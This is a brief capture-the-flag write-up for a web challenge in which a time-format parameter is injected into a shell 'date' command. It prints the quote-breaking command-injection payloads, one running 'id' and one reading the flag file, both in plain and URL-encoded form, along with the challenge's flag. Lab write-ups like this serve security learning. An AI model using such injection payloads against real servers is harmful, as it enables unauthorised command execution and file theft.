TimeKORP

Personal Rating: Easy

We have a Site that displays the time or date

It uses popper

It can be guessed that the server uses this OS command to get the time:

date '+%Y-%m-%d' 2>&1

But you also specifically find this command if you look at the server files

Creating such an injection will output the result of the os command at the web page:

%Y-%m-%d';x=$(id);echo ${x}'

Which is this in URL encoded format:

%Y-%m-%d%27;x=$(id);echo%20${x}%27

With some basic commands and using curl you could easily build a PoC script.

This request worked for obtaining the flag:

http://83.136.249.237:53283/?format=%Y-%m-%d%27;x=$(cat%20../flag);echo%20${x}%27

Which includes this payload: %Y-%m-%d';x=$(cat ../flag);echo ${x}'

HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}